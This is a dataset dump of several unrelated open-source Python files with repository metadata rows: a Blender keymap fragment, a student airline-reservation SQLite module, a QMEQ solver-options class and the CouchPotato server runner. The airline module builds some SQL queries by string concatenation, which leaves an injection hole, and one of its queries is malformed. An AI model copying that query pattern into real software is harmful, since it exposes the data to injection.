kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new_modal('EDGESLIDE_EDGE_NEXT', 'WHEELDOWNMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('EDGESLIDE_PREV_NEXT', 'WHEELUPMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
# Map Gesture Border
km = kc.keymaps.new('Gesture Border', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('BEGIN', 'LEFTMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE', shift=True)
kmi = km.keymap_items.new_modal('DESELECT', 'LEFTMOUSE', 'RELEASE', ctrl=True)
| gpl-2.0 | -9,156,502,979,376,254,000 | 63.175573 | 106 | 0.708517 | false | 2.716756 | false | false | false |
YOUR-WORST-TACO/AdvPythonProject | Program/airDB/db.py | 1 | 7946 | """
AIRLINE RESERVATION SYSTEM
DEVELOPERS
Stephen Tafoya
Ryan Hamilton
MAIN PROJECT FILE - RUNS ENTIRE PROGRAM
"""
import sqlite3 # ST Import database management
class AirDB(object): # ST
"""
class DB(db)
documentation:
class that handles main database management,
will handle all database operations
"""
# Initializer
def __init__(self, db): # ST
con = self.connectDB(db) # ST
if con is not None: # ST
self.connection = con # ST
self.cursor = self.connection.cursor() # ST
self.setupDB() # ST
def connectDB(self, db): # ST
"""
connectDB
-- create simplified function with error handling
-- to be used externally
-- returns a connection or None
"""
try:
conn = sqlite3.connect(db) # ST connect to database specified
return conn # ST return connection
except sqlite3.Error as e: # ST catch all sqlite3 errors
print(e) # ST display error
return None # ST return None
def setupDB(self): # ST makes sure the db has correct table
self.cursor.execute('''CREATE TABLE IF NOT EXISTS AIRPORTS (
id integer PRIMARY KEY AUTOINCREMENT,
country text NOT NULL,
state text NOT NULL,
airport text NOT NULL
)''') # ST
def insertAirport(self, query): # ST
"""
adds a new index to airports
should be tuple of format
(country, state, airport)
"""
datastr = '''INSERT INTO AIRPORTS(country,state,airport) VALUES(?,?,?)'''
try:
self.cursor.execute(datastr, query) # ST attempt to querry
except sqlite3.Error as e: # ST catch error
print(e, "failed") # ST display error
def insertAirports(self, table): # ST calls insertAirport with table
for query in table: # ST for each element in table
self.insertAirport(query) # ST insert airport
def loadCountries(self): # RH loads all countries in database
self.cursor.execute('SELECT country FROM AIRPORTS') # RH
all_countries = self.cursor.fetchall() # RH
countries = [] # RH
for i in range(0, len(all_countries)): # RH
temp_var = all_countries[i][0] # RH
countries.append(temp_var) # RH
return countries # RH
def loadStates(self, country): # RH
# Loads all states in database that are in a given country
self.cursor.execute('SELECT state FROM AIRPORTS WHERE country = {x}'. # RH
format(x="'" + country + "'")) # RH
all_states = self.cursor.fetchall() # RH
states = []
for i in range(0, len(all_states)): # RH
temp_var = all_states[i][0] # RH
states.append(temp_var) # RH
return states # RH
def loadAirports(self, state): # RH
# Loads all airports in database that are in a given state
self.cursor.execute('SELECT airport FROM AIRPORTS WHERE state = {x}'. # RH
format(x="'" + state + "'"))
all_airports = self.cursor.fetchall() # RH
airports = [] # RH
for i in range(0, len(all_airports)): # RH
temp_var = all_airports[i][0] # RH
airports.append(temp_var) # RH
return airports # RH
def findAirport(self, airport): # ST
self.cursor.execute("SELECT id FROM AIRPORTS WHERE airport = ?", (airport,))
val = self.cursor.fetchall() # ST
if val[0][0] >= 0: # ST
return val[0][0] # ST
return -1 # ST
def close(self): # ST
self.connection.commit() # ST sync all changes
self.connection.close() # ST close db
class FlightDB(object): # RH
# Initializer
def __init__(self, db): # RH
con = self.connectDB(db) # RH
if con is not None: # RH
self.connection = con # RH
self.cursor = self.connection.cursor() # RH
self.setupDB() # RH
def connectDB(self, db): # RH
"""
connectDB
-- create simplified function with error handling
-- to be used externally
-- returns a connection or None
"""
try:
conn = sqlite3.connect(db) # RH connect to database specified
return conn # RH return connection
except sqlite3.Error as e: # RH catch all sqlite3 errors
print(e) # RH display error
return None # RH return None
def setupDB(self): # RH
self.cursor.execute('''CREATE TABLE IF NOT EXISTS FLIGHTS (
id integer PRIMARY KEY AUTOINCREMENT,
start int NOT NULL,
stop int NOT NULL,
flight_spec text NOT NULL,
address text NOT NULL,
billing_address text,
cost real NOT NULL,
payment_type int NOT NULL,
payment_card text
)''') # ST
self.cursor.execute('''CREATE TABLE IF NOT EXISTS PASSENGERS (
id integer PRIMARY KEY AUTOINCREMENT,
flight_id integer NOT NULL,
name text NOT NULL,
bags integer NOT NULL,
seating text NOT NULL
)''') # ST
def nextIndex(self):
self.cursor.execute("SELECT id FROM FLIGHTS")
var = self.cursor.fetchall()
return len(var)
def insertFlight(self, query): # RH
# adds a new index to the flights table in the database.
data = '''INSERT INTO FLIGHTS(start, stop, flight_spec, address, billing_address, cost, payment_type, payment_card) VALUES(?, ?, ?, ?, ?, ?, ?, ?)'''
try: # RH
self.cursor.execute(data, query) # RH
except sqlite3.Error as e: # RH
print(e, "failed") # RH
def insertFlights(self, table): # RH
for query in table: # RH
self.insertFlight(query) # RH
def insertPassenger(self, query): # RH
# adds a new index to the passangers table in the database
data = '''INSERT INTO PASSENGERS(flight_id, name, bags, seating) VALUES(?, ?, ?, ?)'''
try:
self.cursor.execute(data, query) # RH
except sqlite3.Error as e: # RH
print(e, "failed") # RH
def insertPassangers(self, table): # RH
for query in table: # RH
self.insertPassenger(query) # RH
def loadFlights(self): # RH
# pulls flights table from database and prints it for display
self.cursor.execute('SELECT FLIGHTS') # RH
all_flights = self.cursor.fetchall() # RH
print(all_flights) # RH
def loadPassangers(self): # RH
# pulls passangers table from database and prints it for display
self.cursor.execute('SELECT PASSENGERS') # RH
all_passengers = self.cursor.fetchall() # RH
print(all_passengers) # RH
def close(self): # RH
self.connection.commit() # RH
self.connection.close() # RH
def main():
pass
if __name__ == "__main__":
main()
| gpl-3.0 | -7,582,402,227,697,296,000 | 36.305164 | 157 | 0.507425 | false | 4.162389 | false | false | false |
gedaskir/qmeq | qmeq/builder/funcprop.py | 1 | 5038 | """Module containing FunctionProperties class."""
class FunctionProperties(object):
"""
Class containing miscellaneous variables for Approach and Approach2vN classes.
Attributes
----------
symq : bool
For symq=False keep all equations in the kernel, and the matrix is of size N by N+1.
For symq=True replace one equation by the normalisation condition,
and the matrix is square N by N.
norm_row : int
If symq=True this row will be replaced by normalisation condition in the kernel matrix.
solmethod : string
String specifying the solution method of the equation L(Phi0)=0.
The possible values are matrix inversion 'solve' and least squares 'lsqr'.
Method 'solve' works only when symq=True.
For matrix free methods (used when mfreeq=True) the possible values are
'krylov', 'broyden', etc.
itype : int
Type of integral for first order approach calculations.
itype=0: the principal parts are evaluated using Fortran integration package QUADPACK \
routine dqawc through SciPy.
itype=1: the principal parts are kept, but approximated by digamma function valid for \
large bandwidth D.
itype=2: the principal parts are neglected.
itype=3: the principal parts are neglected and infinite bandwidth D is assumed.
dqawc_limit : int
For itype=0 dqawc_limit determines the maximum number of sub-intervals
in the partition of the given integration interval.
mfreeq : bool
If mfreeq=True the matrix free solution method is used for first order methods.
phi0_init : array
For mfreeq=True the initial value of zeroth order density matrix elements.
mtype_qd : float or complex
Type for the many-body quantum dot Hamiltonian matrix.
mtype_leads : float or complex
Type for the many-body tunneling matrix Tba.
kpnt_left, kpnt_right : int
Number of points Ek_grid is extended to the left and the right for '2vN' approach.
ht_ker : array
Kernel used when performing Hilbert transform using FFT.
It is generated using specfunc.kernel_fredriksen(n).
emin, emax : float
Minimal and maximal energy in the updated Ek_grid generated by neumann2py.get_grid_ext(sys).
Note that emin<=Dmin and emax>=Dmax.
dmin, dmax : float
Bandedge Dmin and Dmax values of the lead electrons.
ext_fct : float
Multiplication factor used in neumann2py.get_grid_ext(sys), when determining emin and emax.
suppress_err : bool
Determines whether to print the warning when the inversion of the kernel failed.
off_diag_corrections: bool
Determines wether to include first oder off-diagonal corrections to the kernel in the
RTD approach.
"""
def __init__(self,
kerntype='2vN', symq=True, norm_row=0, solmethod=None,
itype=0, dqawc_limit=10000, mfreeq=False, phi0_init=None,
mtype_qd=float, mtype_leads=complex, kpnt=None, dband=None,
off_diag_corrections=True):
self.kerntype = kerntype
self.symq = symq
self.norm_row = norm_row
self.solmethod = solmethod
#
self.itype = itype
self.dqawc_limit = dqawc_limit
#
self.mfreeq = mfreeq
self.phi0_init = phi0_init
#
self.mtype_qd = mtype_qd
self.mtype_leads = mtype_leads
#
self.kpnt = kpnt
self.dband = dband
#
self.kpnt_left = 0
self.kpnt_right = 0
self.ht_ker = None
#
self.dmin, self.dmax = 0, 0
self.emin, self.emax = 0, 0
self.ext_fct = 1.1
#
self.suppress_err = False
self.suppress_wrn = [False]
#
self.off_diag_corrections = off_diag_corrections
def print_error(self, exept):
if not self.suppress_err:
print("WARNING: Could not solve the linear set of equations.\n" +
" Error from the solver: " + str(exept) + "\n"
" The reasons for such a failure can be various:\n" +
" 1. Some of the transport channels may be outside the bandwidth D of the leads.\n" +
" In this case removing some of the states with the method [remove_states()] will help.\n" +
" 2. Replacement of one of the equations with the normalisation condition.\n" +
" In this case try to use different [norm_row]\n"+
" or solve the linear system using [symq=False] and the solution method [solmethod='lsqr'].\n"
" This warning will not be shown again.\n"
" To check if the solution succeeded check the property [success].")
self.suppress_err = True
def print_warning(self, i, message):
if not self.suppress_wrn[i]:
print(message)
self.suppress_wrn[i] = True
| bsd-2-clause | -3,665,908,777,324,899,000 | 43.982143 | 116 | 0.62505 | false | 3.960692 | false | false | false |
kthordarson/CouchPotatoServer | couchpotato/runner.py | 28 | 12513 | from logging import handlers
from uuid import uuid4
import locale
import logging
import os.path
import sys
import time
import traceback
import warnings
import re
import tarfile
import shutil
from CodernityDB.database_super_thread_safe import SuperThreadSafeDatabase
from argparse import ArgumentParser
from cache import FileSystemCache
from couchpotato import KeyHandler, LoginHandler, LogoutHandler
from couchpotato.api import NonBlockHandler, ApiHandler
from couchpotato.core.event import fireEventAsync, fireEvent
from couchpotato.core.helpers.encoding import sp
from couchpotato.core.helpers.variable import getDataDir, tryInt, getFreeSpace
import requests
from requests.packages.urllib3 import disable_warnings
from tornado.httpserver import HTTPServer
from tornado.web import Application, StaticFileHandler, RedirectHandler
def getOptions(args):
# Options
parser = ArgumentParser(prog = 'CouchPotato.py')
parser.add_argument('--data_dir',
dest = 'data_dir', help = 'Absolute or ~/ path of the data dir')
parser.add_argument('--config_file',
dest = 'config_file', help = 'Absolute or ~/ path of the settings file (default DATA_DIR/settings.conf)')
parser.add_argument('--debug', action = 'store_true',
dest = 'debug', help = 'Debug mode')
parser.add_argument('--console_log', action = 'store_true',
dest = 'console_log', help = "Log to console")
parser.add_argument('--quiet', action = 'store_true',
dest = 'quiet', help = 'No console logging')
parser.add_argument('--daemon', action = 'store_true',
dest = 'daemon', help = 'Daemonize the app')
parser.add_argument('--pid_file',
dest = 'pid_file', help = 'Path to pidfile needed for daemon')
options = parser.parse_args(args)
data_dir = os.path.expanduser(options.data_dir if options.data_dir else getDataDir())
if not options.config_file:
options.config_file = os.path.join(data_dir, 'settings.conf')
if not options.pid_file:
options.pid_file = os.path.join(data_dir, 'couchpotato.pid')
options.config_file = os.path.expanduser(options.config_file)
options.pid_file = os.path.expanduser(options.pid_file)
return options
# Tornado monkey patch logging..
def _log(status_code, request):
if status_code < 400:
return
else:
log_method = logging.debug
request_time = 1000.0 * request.request_time()
summary = request.method + " " + request.uri + " (" + \
request.remote_ip + ")"
log_method("%d %s %.2fms", status_code, summary, request_time)
def runCouchPotato(options, base_path, args, data_dir = None, log_dir = None, Env = None, desktop = None):
try:
locale.setlocale(locale.LC_ALL, "")
encoding = locale.getpreferredencoding()
except (locale.Error, IOError):
encoding = None
# for OSes that are poorly configured I'll just force UTF-8
if not encoding or encoding in ('ANSI_X3.4-1968', 'US-ASCII', 'ASCII'):
encoding = 'UTF-8'
Env.set('encoding', encoding)
# Do db stuff
db_path = sp(os.path.join(data_dir, 'database'))
old_db_path = os.path.join(data_dir, 'couchpotato.db')
# Remove database folder if both exists
if os.path.isdir(db_path) and os.path.isfile(old_db_path):
db = SuperThreadSafeDatabase(db_path)
db.open()
db.destroy()
# Check if database exists
db = SuperThreadSafeDatabase(db_path)
db_exists = db.exists()
if db_exists:
# Backup before start and cleanup old backups
backup_path = sp(os.path.join(data_dir, 'db_backup'))
backup_count = 5
existing_backups = []
if not os.path.isdir(backup_path): os.makedirs(backup_path)
for root, dirs, files in os.walk(backup_path):
# Only consider files being a direct child of the backup_path
if root == backup_path:
for backup_file in sorted(files):
ints = re.findall('\d+', backup_file)
# Delete non zip files
if len(ints) != 1:
try: os.remove(os.path.join(root, backup_file))
except: pass
else:
existing_backups.append((int(ints[0]), backup_file))
else:
# Delete stray directories.
shutil.rmtree(root)
# Remove all but the last 5
for eb in existing_backups[:-backup_count]:
os.remove(os.path.join(backup_path, eb[1]))
# Create new backup
new_backup = sp(os.path.join(backup_path, '%s.tar.gz' % int(time.time())))
zipf = tarfile.open(new_backup, 'w:gz')
for root, dirs, files in os.walk(db_path):
for zfilename in files:
zipf.add(os.path.join(root, zfilename), arcname = 'database/%s' % os.path.join(root[len(db_path) + 1:], zfilename))
zipf.close()
# Open last
db.open()
else:
db.create()
# Force creation of cachedir
log_dir = sp(log_dir)
cache_dir = sp(os.path.join(data_dir, 'cache'))
python_cache = sp(os.path.join(cache_dir, 'python'))
if not os.path.exists(cache_dir):
os.mkdir(cache_dir)
if not os.path.exists(python_cache):
os.mkdir(python_cache)
session = requests.Session()
session.max_redirects = 5
# Register environment settings
Env.set('app_dir', sp(base_path))
Env.set('data_dir', sp(data_dir))
Env.set('log_path', sp(os.path.join(log_dir, 'CouchPotato.log')))
Env.set('db', db)
Env.set('http_opener', session)
Env.set('cache_dir', cache_dir)
Env.set('cache', FileSystemCache(python_cache))
Env.set('console_log', options.console_log)
Env.set('quiet', options.quiet)
Env.set('desktop', desktop)
Env.set('daemonized', options.daemon)
Env.set('args', args)
Env.set('options', options)
# Determine debug
debug = options.debug or Env.setting('debug', default = False, type = 'bool')
Env.set('debug', debug)
# Development
development = Env.setting('development', default = False, type = 'bool')
Env.set('dev', development)
# Disable logging for some modules
for logger_name in ['enzyme', 'guessit', 'subliminal', 'apscheduler', 'tornado', 'requests']:
logging.getLogger(logger_name).setLevel(logging.ERROR)
for logger_name in ['gntp']:
logging.getLogger(logger_name).setLevel(logging.WARNING)
# Disable SSL warning
disable_warnings()
# Use reloader
reloader = debug is True and development and not Env.get('desktop') and not options.daemon
# Logger
logger = logging.getLogger()
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s', '%m-%d %H:%M:%S')
level = logging.DEBUG if debug else logging.INFO
logger.setLevel(level)
logging.addLevelName(19, 'INFO')
# To screen
if (debug or options.console_log) and not options.quiet and not options.daemon:
hdlr = logging.StreamHandler(sys.stderr)
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
# To file
hdlr2 = handlers.RotatingFileHandler(Env.get('log_path'), 'a', 500000, 10, encoding = Env.get('encoding'))
hdlr2.setFormatter(formatter)
logger.addHandler(hdlr2)
# Start logging & enable colors
# noinspection PyUnresolvedReferences
import color_logs
from couchpotato.core.logger import CPLog
log = CPLog(__name__)
log.debug('Started with options %s', options)
# Check available space
try:
total_space, available_space = getFreeSpace(data_dir)
if available_space < 100:
log.error('Shutting down as CP needs some space to work. You\'ll get corrupted data otherwise. Only %sMB left', available_space)
return
except:
log.error('Failed getting diskspace: %s', traceback.format_exc())
def customwarn(message, category, filename, lineno, file = None, line = None):
log.warning('%s %s %s line:%s', (category, message, filename, lineno))
warnings.showwarning = customwarn
# Create app
from couchpotato import WebHandler
web_base = ('/' + Env.setting('url_base').lstrip('/') + '/') if Env.setting('url_base') else '/'
Env.set('web_base', web_base)
api_key = Env.setting('api_key')
if not api_key:
api_key = uuid4().hex
Env.setting('api_key', value = api_key)
api_base = r'%sapi/%s/' % (web_base, api_key)
Env.set('api_base', api_base)
# Basic config
host = Env.setting('host', default = '0.0.0.0')
host6 = Env.setting('host6', default = '::')
config = {
'use_reloader': reloader,
'port': tryInt(Env.setting('port', default = 5050)),
'host': host if host and len(host) > 0 else '0.0.0.0',
'host6': host6 if host6 and len(host6) > 0 else '::',
'ssl_cert': Env.setting('ssl_cert', default = None),
'ssl_key': Env.setting('ssl_key', default = None),
}
# Load the app
application = Application(
[],
log_function = lambda x: None,
debug = config['use_reloader'],
gzip = True,
cookie_secret = api_key,
login_url = '%slogin/' % web_base,
)
Env.set('app', application)
# Request handlers
application.add_handlers(".*$", [
(r'%snonblock/(.*)(/?)' % api_base, NonBlockHandler),
# API handlers
(r'%s(.*)(/?)' % api_base, ApiHandler), # Main API handler
(r'%sgetkey(/?)' % web_base, KeyHandler), # Get API key
(r'%s' % api_base, RedirectHandler, {"url": web_base + 'docs/'}), # API docs
# Login handlers
(r'%slogin(/?)' % web_base, LoginHandler),
(r'%slogout(/?)' % web_base, LogoutHandler),
# Catch all webhandlers
(r'%s(.*)(/?)' % web_base, WebHandler),
(r'(.*)', WebHandler),
])
# Static paths
static_path = '%sstatic/' % web_base
for dir_name in ['fonts', 'images', 'scripts', 'style']:
application.add_handlers(".*$", [
('%s%s/(.*)' % (static_path, dir_name), StaticFileHandler, {'path': sp(os.path.join(base_path, 'couchpotato', 'static', dir_name))})
])
Env.set('static_path', static_path)
# Load configs & plugins
loader = Env.get('loader')
loader.preload(root = sp(base_path))
loader.run()
# Fill database with needed stuff
fireEvent('database.setup')
if not db_exists:
fireEvent('app.initialize', in_order = True)
fireEvent('app.migrate')
# Go go go!
from tornado.ioloop import IOLoop
from tornado.autoreload import add_reload_hook
loop = IOLoop.current()
# Reload hook
def reload_hook():
fireEvent('app.shutdown')
add_reload_hook(reload_hook)
# Some logging and fire load event
try: log.info('Starting server on port %(port)s', config)
except: pass
fireEventAsync('app.load')
ssl_options = None
if config['ssl_cert'] and config['ssl_key']:
ssl_options = {
'certfile': config['ssl_cert'],
'keyfile': config['ssl_key'],
}
server = HTTPServer(application, no_keep_alive = True, ssl_options = ssl_options)
try_restart = True
restart_tries = 5
while try_restart:
try:
server.listen(config['port'], config['host'])
if Env.setting('ipv6', default = False):
try: server.listen(config['port'], config['host6'])
except: log.info2('Tried to bind to IPV6 but failed')
loop.start()
server.close_all_connections()
server.stop()
loop.close(all_fds = True)
except Exception as e:
log.error('Failed starting: %s', traceback.format_exc())
try:
nr, msg = e
if nr == 48:
log.info('Port (%s) needed for CouchPotato is already in use, try %s more time after few seconds', (config.get('port'), restart_tries))
time.sleep(1)
restart_tries -= 1
if restart_tries > 0:
continue
else:
return
except ValueError:
return
except:
pass
raise
try_restart = False
| gpl-3.0 | -5,350,388,513,148,154,000 | 33.282192 | 155 | 0.600575 | false | 3.743045 | true | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.